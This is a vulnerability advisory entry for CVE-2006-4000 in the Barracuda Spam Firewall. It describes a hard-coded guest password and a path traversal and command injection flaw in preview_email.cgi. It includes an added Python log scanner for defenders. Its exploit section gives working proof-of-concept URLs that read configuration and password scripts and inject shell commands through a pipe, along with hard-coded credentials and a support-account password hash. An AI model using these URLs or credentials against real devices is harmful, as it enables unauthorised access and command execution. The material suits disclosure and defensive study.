Barracuda Networks Spam Firewall Information Disclosure Vulnerability

Vulnerability ID: 1110723
Vulnerability type: Path traversal
Published: 2006-08-01
Updated: 2006-08-08
CVE ID: CVE-2006-4000
CNNVD-ID: CNNVD-200608-066
Platform: CGI
CVSS score: 4.0
|Vulnerability source
https://www.exploit-db.com/exploits/28321
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-066
|Vulnerability details
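Barracuda Spam Firewall is an integrated hardware and software spam solution for protecting mail servers. The guest account in the Login.pm script of the Barracuda Spam Firewall has a hard-coded password, bnadmin99. Although the guest account has only limited access, it can still be used to obtain the following information:

* system configuration, including IP addresses and the administrator IP ACL;
* mail message logs (but not the content of the messages);
* version information for the spam/virus definitions and the system firmware version.

The Barracuda preview_email.cgi script also contains a file disclosure vulnerability. This script is used to retrieve messages from the Barracuda's local message database, but it does not correctly filter the file parameter passed via GET to restrict file retrieval to the message database directory, so any file accessible to the web server user can be read through the web interface. In addition, the pipe character (|) may be used to execute arbitrary commands. Although this script requires a valid user login, that restriction is easily bypassed by combining it with the guest password vulnerability described above.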
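A defender-side illustration of the check that preview_email.cgi is described as lacking, applied as a detection pass over web access logs. This is an added example, not Barracuda's code or part of the original advisory; the message directory /mail/mlog is taken from the URLs on this page, and the log format, client addresses and message file name are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

MESSAGE_DIR = "/mail/mlog"            # message directory as it appears in this page's URLs
SCRIPT = "/cgi-bin/preview_email.cgi"
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')  # assumed common log format

def check_file_param(value, base=MESSAGE_DIR):
    """Return the reasons a `file` value must be rejected; [] means acceptable."""
    reasons = []
    if "|" in value:                  # the advisory reports command execution via '|'
        reasons.append("pipe")
    # Lexical resolution only; a real handler should also resolve symlinks (os.path.realpath).
    resolved = posixpath.normpath(posixpath.join(base, value))
    if not resolved.startswith(base + "/"):   # must name a file strictly below the directory
        reasons.append("outside-message-dir")
    return reasons

def scan(lines):
    """Return (client, file value, reasons) for each suspicious preview_email.cgi request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != SCRIPT:
            continue
        for value in parse_qs(url.query).get("file", []):   # parse_qs percent-decodes
            reasons = check_file_param(value)
            if reasons:
                hits.append((client, value, reasons))
    return hits

# Constructed access-log lines (documentation addresses, invented message and image names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2006:10:00:00 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/1154426400-msg HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Aug/2006:10:01:00 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp HTTP/1.1" 200 9041',
    '192.0.2.11 - - [01/Aug/2006:10:02:00 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a| HTTP/1.1" 200 88',
    '192.0.2.12 - - [01/Aug/2006:10:03:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same check_file_param logic, run before the file is opened, is the server-side fix; in the log scan it separates ordinary message previews from requests that leave the message directory or carry a pipe.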
|Exploit
source: http://www.securityfocus.com/bid/19276/info

Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.

A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.

Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.

####################################################################
 
Proof of Concept:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`;
login: guest pass: phteam99

Some folders are accessible via HTTP without permission:
https://<deviceIP>/Translators/
https://<deviceIP>/images/
https://<deviceIP>/locale
https://<deviceIP>/plugins
https://<deviceIP>/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
|References

Source: BID
Name: 19276
Link: http://www.securityfocus.com/bid/19276
Source: BUGTRAQ
Name: 20060801 Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
Link: http://www.securityfocus.com/archive/1/archive/1/441861/100/0/threaded
Source: XF
Name: barracuda-previewemail-info-disclosure(28214)
Link: http://xforce.iss.net/xforce/xfdb/28214
Source: VUPEN
Name: ADV-2006-3104
Link: http://www.frsirt.com/english/advisories/2006/3104
Source: SECUNIA
Name: 21258
Link: http://secunia.com/advisories/21258